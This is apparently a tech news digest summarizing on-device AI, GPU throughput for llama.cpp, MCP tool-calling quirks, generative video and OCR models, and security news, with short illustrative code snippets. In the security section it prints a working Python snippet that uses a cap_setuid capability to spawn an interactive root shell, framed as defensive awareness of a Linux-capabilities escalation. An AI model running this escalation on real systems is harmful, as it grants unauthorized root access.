Phones inch toward real local AI
iPhone-class hardware is starting to feel genuinely capable of on-device AI beyond gimmicks. A developer reports Qwen3 4B running around 25 tokens/sec on an iPhone 17 (A19 Pro) GPU via Apple’s MLX, a significant jump over iPhone 16 Pro, with better thermals and the GPU “catching up” to Apple’s Neural Engine for local inference. The thread debates usefulness and quantization trade-offs: some argue phones remain too constrained, others point out 1–4B models feel snappy and, paired with search tools, are already practical for private, low-latency tasks. The post is from the maker of the Vector Space app (in beta), but the observations reflect a broader trend of small models becoming usable on recent iPhones. (more: https://www.reddit.com/r/LocalLLaMA/comments/1oarkn3/i_am_generally_impressed_by_iphone_17_gpu/)
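For a feel of what this looks like in code, here is a minimal sketch using the mlx-lm Python package on an Apple Silicon Mac; the iPhone app itself would go through MLX's Swift bindings, and the quantized model ID below is an assumption rather than something the post specifies.

```python
# Minimal sketch: running a small Qwen3 model with Apple's MLX via the mlx-lm
# Python package on an Apple Silicon Mac. The on-device iPhone app would use
# MLX's Swift bindings instead; the 4-bit repo ID below is an assumption.
from mlx_lm import load, generate

model, tokenizer = load("mlx-community/Qwen3-4B-4bit")  # hypothetical quantized repo

messages = [{"role": "user", "content": "Summarize the trade-offs of running a 4B model on a phone."}]
prompt = tokenizer.apply_chat_template(messages, add_generation_prompt=True)

# verbose=True prints generation speed (tokens/sec), the metric quoted in the post.
text = generate(model, tokenizer, prompt=prompt, max_tokens=256, verbose=True)
print(text)
```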
Voice is joining the party. An iOS developer got Kokoro TTS running fully on-device using the full 325 MB ONNX model with real voice embeddings—no server calls—producing natural 24 kHz audio in about four seconds per sentence and supporting 50+ voices across multiple languages. They integrate espeak-ng for phonetic handling and are considering quantization to shave latency. Others note iOS apps with local Kokoro already exist, underscoring how quickly high-quality local TTS is maturing. (more: https://www.reddit.com/r/LocalLLaMA/comments/1o8m1v0/i_got_kokoro_tts_running_natively_on_ios/)
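For anyone curious what such an export expects, a small onnxruntime sketch (desktop Python rather than the iOS build) can inspect the graph's inputs and outputs; the exact tensor names and voice-embedding format vary by export, so none are assumed here.

```python
# Minimal sketch: inspecting a Kokoro ONNX export with onnxruntime on the desktop
# (the iOS app runs the same model through ONNX Runtime on-device). Tensor names
# and shapes depend on the specific export, so we print them rather than assume
# them; phonemization (espeak-ng in the post) happens before any tensors exist.
import onnxruntime as ort

sess = ort.InferenceSession("kokoro.onnx")  # hypothetical local path to the 325 MB model

for i in sess.get_inputs():
    print("input ", i.name, i.shape, i.type)   # e.g. token IDs, voice/style embedding, speed
for o in sess.get_outputs():
    print("output", o.name, o.shape, o.type)   # e.g. 24 kHz waveform samples
```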
Open tooling is making local deployment easier on mobile. PrivateMind, a FOSS chat app with on-device inference and RAG, uses React Native ExecuTorch; models are exported to .pte via Optimum-ExecuTorch, and the team is exploring a hybrid fallback to cloud for heavier tasks. Meanwhile, at the hobbyist end of the spectrum, a Gemma 3 1B Q4 build tuned for Raspberry Pi runs fully offline via Ollama at ~3.67 tok/s on a Pi 4/5, with a local “MCP-style” tool registry to run scripts and read metrics, showing that useful agent-style workflows can exist entirely offline even with very small models. (more: https://www.reddit.com/r/LocalLLaMA/comments/1obvb5g/mobile_fully_on_device_inference_ai_chat_app_with/) (more: https://www.reddit.com/r/ollama/comments/1obxfoc/gemma_3_1b_smart_q4_bilingual_iten_offline_ai_for/)
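A rough sketch of that pattern, using only Ollama's local REST API and the standard library; the tool registry contents, model tag, and prompt are illustrative, not taken from the project.

```python
# Minimal sketch of an offline "tool registry" next to a small local model served
# by Ollama on a Raspberry Pi. The registry contents, model tag, and prompt format
# are illustrative; the actual project wires this differently.
import json
import subprocess
import urllib.request

OLLAMA_URL = "http://localhost:11434/api/chat"
MODEL = "gemma3:1b"  # assumed tag for a Gemma 3 1B Q4 build

# Local "tools": plain functions the host can run without any network access.
TOOLS = {
    "uptime": lambda: subprocess.check_output(["uptime"], text=True).strip(),
    "disk_free": lambda: subprocess.check_output(["df", "-h", "/"], text=True).strip(),
}

def chat(prompt: str) -> str:
    body = json.dumps({
        "model": MODEL,
        "messages": [{"role": "user", "content": prompt}],
        "stream": False,
    }).encode()
    req = urllib.request.Request(OLLAMA_URL, data=body,
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req) as resp:
        return json.loads(resp.read())["message"]["content"]

# Run a tool locally, then let the model summarize its output.
metrics = TOOLS["disk_free"]()
print(chat(f"Summarize these disk metrics in one sentence:\n{metrics}"))
```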
Open computing, shrinking freedoms
The ability to run what you want on machines you own is eroding, argues a Hackaday editorial that traces a clear throughline: consoles pioneered walled gardens; the iPhone normalized them under a safety/quality banner; and Android and Windows have steadily tightened controls, often justified as security while advancing platform monetization. The result is less experimentation and a chilling effect on grassroots innovation. The piece’s call to action—vote with your wallet—will resonate as more people attempt to deploy private, on-device AI and run into locked-down ecosystems with gatekeepers in the loop. (more: https://hackaday.com/2025/10/22/what-happened-to-running-what-you-wanted-on-your-own-machine/)
Viewed through the lens of local AI, this tension is obvious: users are increasingly interested in privacy-preserving, offline models for chat, TTS, and tools, yet more platform layers sit between the developer and the hardware. That doesn’t make local AI impossible—far from it—but it raises the importance of open runtimes and formats, and of platforms that allow users to choose what runs on their silicon. (more: https://hackaday.com/2025/10/22/what-happened-to-running-what-you-wanted-on-your-own-machine/)
The practical upshot is a bifurcation: rapid progress in open, local AI tooling alongside platform policies that can constrain distribution and capabilities. The friction isn’t theoretical; it affects whether an app can ship local inference by default or must fall back to a cloud endpoint. (more: https://hackaday.com/2025/10/22/what-happened-to-running-what-you-wanted-on-your-own-machine/)
GPUs and local LLM throughput
A Valve developer quietly pushed llama.cpp performance forward on AMD by contributing a RADV Vulkan improvement that boosts prompt processing throughput by roughly 13% on Linux. Community benchmarks on a Strix Halo running gpt-oss-120b-GGUF show pp512 rising from ~521 to ~624 tokens/s moving from Mesa 25.2.4 to 25.3.0-rc1, with ROCm still leading at ~753 tokens/s; token generation (tg) rates remain close across stacks. Vulkan is narrowing the gap in prompt processing, improving the out-of-the-box experience for AMD users who don’t want to rely on ROCm. (more: https://www.reddit.com/r/LocalLLaMA/comments/1o8wuyj/valve_developer_contributes_major_improvement_to/)
Meanwhile, would-be home labbers eyeing 72B models are reminded that VRAM, not cores, is king. Thread consensus: for dense 72B, target at least 72 GB VRAM for 8-bit (near-full-quality) or ~36 GB for 4-bit with an expected 10–20% quality hit; plan extra VRAM for context windows (rule-of-thumb cited: ~1 GB per 4k tokens). Dual 24 GB GPUs can get you into 70B territory with quantization; used MI50s (32 GB) are a budget option, though power and setup complexity rise. CPU matters mainly for PCIe lanes to feed multiple GPUs; CPU offloading will kneecap tokens/sec. Also consider vLLM for serving. (more: https://www.reddit.com/r/LocalLLaMA/comments/1o8uemm/i_want_to_build_an_ai_inference_server_for_72b/)
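Those rules of thumb are easy to sanity-check with a back-of-the-envelope calculation; the sketch below just restates the thread's heuristics (bytes per parameter plus a per-token context allowance), not a precise memory model.

```python
# Back-of-the-envelope VRAM estimate for a dense 72B model, restating the thread's
# heuristics: ~1 byte/param at 8-bit, ~0.5 byte/param at 4-bit, plus roughly 1 GB
# of KV cache per 4k tokens of context. Real usage also depends on architecture,
# framework overhead, and batch size.
def vram_gb(params_b: float, bits: int, context_tokens: int) -> float:
    weights_gb = params_b * bits / 8            # billions of params * bytes/param ≈ GB
    kv_cache_gb = context_tokens / 4096 * 1.0   # thread's ~1 GB per 4k tokens rule
    return weights_gb + kv_cache_gb

for bits in (8, 4):
    total = vram_gb(72, bits, context_tokens=16_384)
    print(f"72B @ {bits}-bit with 16k context ≈ {total:.0f} GB VRAM")
# 8-bit lands around 76 GB (multi-GPU territory); 4-bit around 40 GB (close to 2x24 GB).
```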
The broader takeaway: software stack choices (Vulkan vs ROCm), quantization, and memory planning are decisive for throughput. Shaving double-digit percentages in prompt processing at the driver layer can mean the difference between “usable” and “not quite there” when serving large models interactively. (more: https://www.reddit.com/r/LocalLLaMA/comments/1o8wuyj/valve_developer_contributes_major_improvement_to/)
Agents, tools, and MCP reality checks
Tool calling remains fragmented. Developers integrating Ollama Cloud discovered that its tool call format lacks call IDs and doesn’t support parallel tool calls, which complicates mapping tool responses back to specific requests. Some models (e.g., gpt-oss-120b) may not return tool_call_id consistently, while others (e.g., Qwen3 variants) behave better; filtering for models explicitly marked as supporting Tools helps. Expect stop reasons to come back as “stop,” not “tool_calls.” (more: https://www.reddit.com/r/ollama/comments/1o93mz0/ollama_cloud_api_tool_usage/)
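Until the format settles, a defensive client can fall back to matching results by position and name when no call ID comes back; the dict shapes below are assumptions sketched from the thread, not a documented Ollama Cloud schema.

```python
# Defensive mapping of tool results back to tool calls when the provider omits call
# IDs and doesn't issue parallel calls. The dict shapes here are assumptions based
# on the thread, not a documented Ollama Cloud schema.
def pair_tool_results(tool_calls: list[dict], results: list[dict]) -> list[dict]:
    paired = []
    for idx, call in enumerate(tool_calls):
        call_id = call.get("id") or f"call_{idx}"  # synthesize an ID if the provider omits one
        # Prefer an explicit ID match; otherwise fall back to position.
        match = next((r for r in results if r.get("tool_call_id") == call.get("id")), None)
        if match is None and idx < len(results):
            match = results[idx]
        paired.append({
            "tool_call_id": call_id,
            "name": call.get("function", {}).get("name"),
            "content": match.get("content") if match else None,
        })
    return paired
```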
Model Context Protocol (MCP) support is also uneven in clients. A developer reported that Claude Desktop didn’t react to MCP server-side notifications like sendToolsListChanged() per the TypeScript SDK, with no feedback from the MCP Inspector either—raising questions about notification support vs. polling-only implementations. This is the sort of portability friction that keeps agents from being plug-and-play. (more: https://www.reddit.com/r/ClaudeAI/comments/1o9uyr2/does_claude_desktop_support_mcp_server/)
On the human-in-the-loop side, power users are noticing inconsistency in coding assistants. One account describes canceling Claude Pro because it felt “dumbed down,” switching to ChatGPT Plus, which seemed better at first but then stumbled on simple SQL that free Claude Sonnet one-shot. For everyday code completion and small transformations, these swings erode trust; developers want predictable behavior more than occasional brilliance. (more: https://www.reddit.com/r/ChatGPTCoding/comments/1o8cb20/chatgpt_or_claude_for_web_coding_assitant/)
Real-time long‑video understanding
StreamingVLM tackles the hard problem of understanding effectively infinite video streams with stable, real-time responses by aligning training with streaming inference and maintaining a compact KV cache. This avoids quadratic cost and the artifacts of naive sliding windows, enabling up to 8 FPS on a single H100 GPU. Impressively, it not only delivers on long-form streaming but also boosts standard VQA without task-specific finetuning. (more: https://github.com/mit-han-lab/streaming-vlm)
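To make "compact KV cache" concrete, here is a generic sketch of the attention-sink-plus-recent-window idea (in the spirit of the group's earlier streaming-attention work); it is illustrative only, and StreamingVLM's actual cache layout and eviction policy are defined in the repo, not here.

```python
# Generic sketch of a bounded KV cache for streaming attention: keep a few "sink"
# entries from the start of the stream plus a rolling window of recent entries, so
# memory stays constant no matter how long the stream runs. Illustrative only; it
# is not StreamingVLM's implementation.
from collections import deque

class CompactKVCache:
    def __init__(self, num_sink: int = 4, window: int = 4096):
        self.sink = []                      # first few positions, never evicted
        self.recent = deque(maxlen=window)  # rolling window of recent positions
        self.num_sink = num_sink

    def append(self, kv_entry):
        if len(self.sink) < self.num_sink:
            self.sink.append(kv_entry)
        else:
            self.recent.append(kv_entry)    # deque drops the oldest entry automatically

    def view(self):
        # What attention actually sees: bounded, regardless of stream length.
        return self.sink + list(self.recent)
```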
On a new long-video benchmark, the authors report a 66.18% win rate against GPT-4o mini, a strong signal that tailored architectures can outpace general models for specific regimes like streaming. The repo includes end-to-end scripts: preprocessing LiveCC, SFT training in two stages, and efficiency benchmarking. (more: https://github.com/mit-han-lab/streaming-vlm)
Evaluation covers both public kits and in-house suites: VLMEvalKit for VQA tasks, OVOBench for diverse video workloads, and LiveSports3K-cc for live commentary analysis. Practitioners can tweak inference FPS directly via a small code edit, making it straightforward to dial in latency/quality trade-offs for deployment targets. (more: https://github.com/mit-han-lab/streaming-vlm)
Identity‑faithful faces and fast image‑to‑video
WithAnyone aims to break the identity vs. “copy-paste” trade-off in face generation. Rather than pasting a reference face, it provides controllable, ID-consistent generation—including multiple identities in one image—while preserving flexibility over expressions, hairstyles, accessories, and poses. A key control is a slider trading “resemblance in spirit” (SigLIP embedding) vs. “resemblance in form” (ArcFace embedding), and it requires face bounding boxes to tell the model where to render faces. A Gradio demo, LoRA merging, and evaluation scripts are included; the model weights are released for non-commercial academic use under FLUX.1 dev’s license. (more: https://github.com/Doby-Xu/WithAnyone)
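Conceptually, the slider is an interpolation between two identity signals; the toy sketch below blends a semantic (SigLIP-style) embedding with a geometric (ArcFace-style) one using a single weight, which illustrates how such a control could be exposed, not WithAnyone's actual conditioning code.

```python
# Toy sketch of the "spirit vs. form" slider: blend a SigLIP-style identity
# embedding with an ArcFace-style one via a single weight. Assumes both embeddings
# have already been projected to a shared conditioning dimension; WithAnyone's real
# conditioning pathway is more involved and lives in the repo.
import numpy as np

def blend_identity(siglip_emb: np.ndarray, arcface_emb: np.ndarray, alpha: float) -> np.ndarray:
    """alpha=0 -> resemblance in spirit (SigLIP); alpha=1 -> resemblance in form (ArcFace)."""
    s = siglip_emb / np.linalg.norm(siglip_emb)
    a = arcface_emb / np.linalg.norm(arcface_emb)
    mix = (1 - alpha) * s + alpha * a
    return mix / np.linalg.norm(mix)
```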
On the video side, Wan2.2 I2V pushes inference efficiency: a distilled, MoE-based image-to-video model that generates high-quality videos in just four steps (two high-noise + two low-noise) and without classifier-free guidance. The team emphasizes high-noise two-step training improvements for dynamics/consistency while reusing Wan2.1 LoRAs for low-noise. The lightx2v engine accelerates inference; recommended settings use the Euler scheduler with shift=5.0 and guidance_scale=1.0. The model is Apache 2.0-licensed. (more: https://huggingface.co/lightx2v/Wan2.2-I2V-A14B-Moe-Distill-Lightx2v)
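The recommended settings translate into very little sampler code. Below is a hedged sketch expressed against a diffusers-style pipeline; the model card's recommended path is the lightx2v engine, and whether this exact distilled checkpoint loads via from_pretrained is an assumption.

```python
# Hedged sketch of the recommended sampling settings (4 steps, Euler-style
# flow-matching scheduler with shift=5.0, guidance_scale=1.0) in a diffusers-style
# pipeline. The card recommends the lightx2v engine; loading this checkpoint
# directly with from_pretrained is an assumption, not a documented path.
import torch
from diffusers import WanImageToVideoPipeline, FlowMatchEulerDiscreteScheduler
from diffusers.utils import export_to_video, load_image

pipe = WanImageToVideoPipeline.from_pretrained(
    "lightx2v/Wan2.2-I2V-A14B-Moe-Distill-Lightx2v", torch_dtype=torch.bfloat16
).to("cuda")
pipe.scheduler = FlowMatchEulerDiscreteScheduler.from_config(pipe.scheduler.config, shift=5.0)

image = load_image("first_frame.png")  # hypothetical input frame
video = pipe(
    image=image,
    prompt="a slow pan across a misty forest",
    num_inference_steps=4,   # 2 high-noise + 2 low-noise steps in the distilled model
    guidance_scale=1.0,      # distillation removes the need for classifier-free guidance
).frames[0]
export_to_video(video, "out.mp4", fps=16)
```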
The throughline across both projects is precise control—of identity fidelity in images and of temporal coherence and speed in video—signals that generative media is maturing from “can it render?” to “can it match intent fast, reliably, and safely?” (more: https://github.com/Doby-Xu/WithAnyone) (more: https://huggingface.co/lightx2v/Wan2.2-I2V-A14B-Moe-Distill-Lightx2v)
OCR becomes document AI
Open-weight VLMs have transformed OCR from “transcribe text” into “reconstruct documents.” A comprehensive guide shows modern models preserving layout, parsing tables/charts, captioning images, handling many scripts, and producing machine-readable outputs (HTML, Markdown, DocTags, JSON) suited to downstream QA and retrieval. It covers when to fine-tune, choosing formats, building evaluation sets, and deployment options from local (e.g., MLX on Apple Silicon) to managed endpoints; stacks like vLLM and SGLang can cut serving costs and latency. (more: https://huggingface.co/blog/ocr-open-models)
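Served behind vLLM's OpenAI-compatible endpoint, the "page in, structured markup out" loop is a few lines of client code; the endpoint, model name, and prompt below are placeholders rather than recommendations from the guide.

```python
# Minimal client sketch for a VLM-based OCR pipeline served behind vLLM's
# OpenAI-compatible API. Endpoint, model name, and prompt are placeholders; the
# guide covers several models and output formats (Markdown, HTML, DocTags, JSON)
# that all fit this request shape.
import base64
from openai import OpenAI

client = OpenAI(base_url="http://localhost:8000/v1", api_key="unused")

with open("invoice_page.png", "rb") as f:
    image_b64 = base64.b64encode(f.read()).decode()

resp = client.chat.completions.create(
    model="my-ocr-vlm",  # whatever model vLLM is serving
    messages=[{
        "role": "user",
        "content": [
            {"type": "text", "text": "Transcribe this page as Markdown, preserving tables and headings."},
            {"type": "image_url", "image_url": {"url": f"data:image/png;base64,{image_b64}"}},
        ],
    }],
)
print(resp.choices[0].message.content)  # machine-readable reconstruction of the page
```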
Reward modeling is also entering the document arena. DocReward targets structuring and stylizing outputs—teaching models to prefer document reconstructions that are both accurate and well-formed. Integrating reward feedback into generation can lift end-to-end quality in ways that raw likelihood training doesn’t capture, especially for complex multi-element documents. (more: https://arxiv.org/abs/2510.11391v1)
Put together, these advances point to OCR that operates as a full document understanding stack: robust parsing, structured outputs for databases/LLMs, and higher-level reasoning over heterogeneous page elements. (more: https://huggingface.co/blog/ocr-open-models) (more: https://arxiv.org/abs/2510.11391v1)
Security: autonomous agents and Unix privileges
An eye-catching claim from LinkedIn: an AI security agent autonomously found and patched a zero-day in Netty (CVE-2025-59419), a widely used networking library. The post says the flaw could have allowed forged emails to bypass SPF, DKIM, and DMARC, and that the agent analyzed code, produced a fix, and submitted it upstream without human-written patches. Maintainers’ cooperation is credited. The broader message is the shift from reactive to autonomous defense; given the venue, treat it as a notable data point rather than a new baseline. (more: https://www.linkedin.com/posts/mavlevin_aisecurity-zeroday-cybersecurity-activity-7386478715813330944-P9OP)
Defenders should also remember that Unix privileges have more facets than SUID/SGID bits. A deep-dive on Linux capabilities shows how setcap can grant powerful rights (e.g., cap_setuid=+ep) to binaries without setting SUID, enabling stealthy privilege escalation. The author demonstrates spawning a root shell via Python with only capabilities tweaks, and provides commands to enumerate capabilities (getcap -r), inspect process caps, and review extended attributes (getfattr). Tools like LinPEAS help hunt for misconfigurations; Elastic documents detections for setcap usage. (more: https://dfir.ch/posts/linux_capabilities/)
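For reference, the escalation the post warns about needs only a few lines of Python once the capability is in place (i.e., someone has previously run setcap cap_setuid=+ep on the interpreter); this is a generic illustration of the technique for defensive awareness, not the post's exact code, and should only be tried in a lab.

```python
# Generic illustration of the cap_setuid escalation described in the post: if the
# Python interpreter carries cap_setuid (no SUID bit involved), a local user can
# become root in a couple of lines. For lab/defensive use only.
import os

os.setuid(0)                                  # allowed because the binary carries cap_setuid
os.execvp("/bin/bash", ["/bin/bash", "-i"])   # spawn an interactive shell as root
```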
The juxtaposition is instructive: AI can help find and fix vulnerabilities faster, but attackers and red-teamers can also exploit under-monitored privilege features. Security programs need automation on both detection and hardening—and an audit routine that goes beyond the usual suspects. (more: https://dfir.ch/posts/linux_capabilities/) (more: https://www.linkedin.com/posts/mavlevin_aisecurity-zeroday-cybersecurity-activity-7386478715813330944-P9OP)
Infra updates: auth and filesystems
On the database side, the OpenFGA team describes rewriting their authorization system to run in pure Postgres, collapsing a multi-store architecture into a single backend. The writeup explains how and why they did it, with an eye toward simplifying operations and aligning performance with a ubiquitous relational substrate. For teams weary of managing multiple distributed stores just to authorize users, the appeal is obvious. (more: https://getrover.substack.com/p/how-we-rewrote-openfga-in-pure-postgres)
In kernel land, an “NTFS Filesystem Remake” dubbed NTFSplus has been posted to LKML. The public link currently gates access behind Anubis proof-of-work to deter scraping, but the subject signals ongoing work on NTFS support in mainline discussions. Filesystems remain the quiet backbone of self-hosted compute; improvements here ripple upward to everything from local AI datasets to scratch-space performance. (more: https://lore.kernel.org/lkml/20251020020749.5522-1-linkinjeon@kernel.org/)
Reducing operational complexity (single-store auth) and strengthening storage layers (filesystems) are the sorts of pragmatic, unglamorous wins that make it easier to run serious workloads—including AI—on your own infrastructure. (more: https://getrover.substack.com/p/how-we-rewrote-openfga-in-pure-postgres) (more: https://lore.kernel.org/lkml/20251020020749.5522-1-linkinjeon@kernel.org/)
Beyond autoregression: music and diffusion LMs
Amadeus addresses a mismatch in symbolic music generation: models often decode note attributes (pitch, duration, velocity, instrument, type) as if they were a temporal sequence, but empirically the decoding order barely matters—suggesting attributes are concurrent, not ordered. The authors propose a two-level design: autoregressive generation across notes, coupled with a bidirectional discrete diffusion decoder within each note’s attributes. With representation learning enhancements (MLSDES contrastive objective) and a Conditional Information Enhancement Module for better conditioning, Amadeus reports at least 4× speed-up over prior methods while improving quality and offering training-free fine-grained control. It supports unconditional, text-conditioned, and attribute-controlled generation. (more: https://arxiv.org/abs/2508.20665v1)
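A rough sketch of the two-level idea as described: notes are produced left to right, but within each note the attribute tokens are refined together over a few discrete-diffusion steps rather than decoded in a fixed order. The function names and step count below are placeholders, not the paper's code.

```python
# Conceptual sketch of Amadeus-style decoding: autoregressive across notes,
# bidirectional discrete diffusion within each note's attributes (pitch, duration,
# velocity, instrument, type). The callables are placeholders for the paper's
# actual modules; only the control flow mirrors the described design.
ATTRIBUTES = ["pitch", "duration", "velocity", "instrument", "type"]

def generate_piece(ar_backbone, attr_denoiser, num_notes: int, diffusion_steps: int = 8):
    notes = []
    for _ in range(num_notes):
        # 1) Autoregressive step: summarize the notes generated so far.
        note_context = ar_backbone(notes)

        # 2) Start every attribute of the new note as a masked token.
        attrs = {name: "<mask>" for name in ATTRIBUTES}

        # 3) Refine all attributes jointly; no fixed decoding order among them.
        for _ in range(diffusion_steps):
            attrs = attr_denoiser(attrs, note_context)

        notes.append(attrs)
    return notes
```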
Diffusion is also making inroads in language modeling. RND1-Base-0910 is a 30.5B-parameter sparse Mixture-of-Experts diffusion language model (≈3.3B active per token) converted from a pretrained autoregressive base (Qwen3-30B-A3B). Text is generated by iteratively denoising over multiple steps, enabling parallel token updates within each diffusion step—a different speed/quality trade-off than left-to-right decoding. The release notes it’s not post-trained yet (expect some repetition with greedy decoding) and suggests optimized MoE kernels (FlashInfer) and SGLang for faster inference. (more: https://huggingface.co/radicalnumerics/RND1-Base-0910)
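The decoding loop differs from left-to-right generation: start from a fully masked sequence and, at each step, commit the most confident predictions in parallel. The sketch below is a generic masked-diffusion decoder under that assumption, not RND1's sampler, and `model` is a placeholder callable.

```python
# Generic masked-diffusion text decoding: begin with an all-mask sequence and fill
# in the highest-confidence positions a chunk at a time, updating many tokens per
# step instead of one. Illustrative only; `model` is a placeholder that returns a
# (token_id, confidence) prediction for every position.
def diffusion_decode(model, seq_len: int, num_steps: int, mask_id: int = -1):
    tokens = [mask_id] * seq_len
    per_step = max(1, seq_len // num_steps)      # how many positions to commit each step

    for _ in range(num_steps):
        preds = model(tokens)                    # [(token_id, confidence), ...] per position
        masked = [i for i, t in enumerate(tokens) if t == mask_id]
        if not masked:
            break
        # Commit the most confident masked positions this step (parallel update).
        masked.sort(key=lambda i: preds[i][1], reverse=True)
        for i in masked[:per_step]:
            tokens[i] = preds[i][0]
    return tokens
```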
Taken together, these lines of work probe a bigger question: where does autoregression remain essential, and where can bidirectional or diffusion-style decoders yield better controllability or efficiency without sacrificing coherence? The answers are becoming domain-specific—and that’s a good thing. (more: https://arxiv.org/abs/2508.20665v1) (more: https://huggingface.co/radicalnumerics/RND1-Base-0910)
Sources (21 articles)
- [Editorial] https://www.linkedin.com/posts/mavlevin_aisecurity-zeroday-cybersecurity-activity-7386478715813330944-P9OP (www.linkedin.com)
- Valve Developer Contributes Major Improvement To RADV Vulkan For Llama.cpp AI (www.reddit.com)
- I got Kokoro TTS running natively on iOS! 🎉 Natural-sounding speech synthesis entirely on-device (www.reddit.com)
- Mobile fully on device inference AI chat app with RAG support (www.reddit.com)
- I am generally impressed by iPhone 17 GPU (www.reddit.com)
- I want to build an AI inference server for 72B models...what should I do? (www.reddit.com)
- ⚡ Gemma 3 1B Smart Q4 — Bilingual (IT/EN) Offline AI for Raspberry Pi 4/5 (www.reddit.com)
- Chatgpt or Claude for web coding assitant (www.reddit.com)
- Does Claude Desktop support MCP Server Notifications? (www.reddit.com)
- mit-han-lab/streaming-vlm (github.com)
- Doby-Xu/WithAnyone (github.com)
- We rewrote OpenFGA in pure Postgres (getrover.substack.com)
- Linux Capabilities Revisited (dfir.ch)
- Ntfsplus: NTFS Filesystem Remake (lore.kernel.org)
- lightx2v/Wan2.2-I2V-A14B-Moe-Distill-Lightx2v (huggingface.co)
- radicalnumerics/RND1-Base-0910 (huggingface.co)
- What Happened To Running What You Wanted On Your Own Machine? (hackaday.com)
- Amadeus: Autoregressive Model with Bidirectional Attribute Modelling for Symbolic Music (arxiv.org)
- Supercharge your OCR Pipelines with Open Models (huggingface.co)
- Ollama Cloud API Tool usage (www.reddit.com)
- DocReward: A Document Reward Model for Structuring and Stylizing (arxiv.org)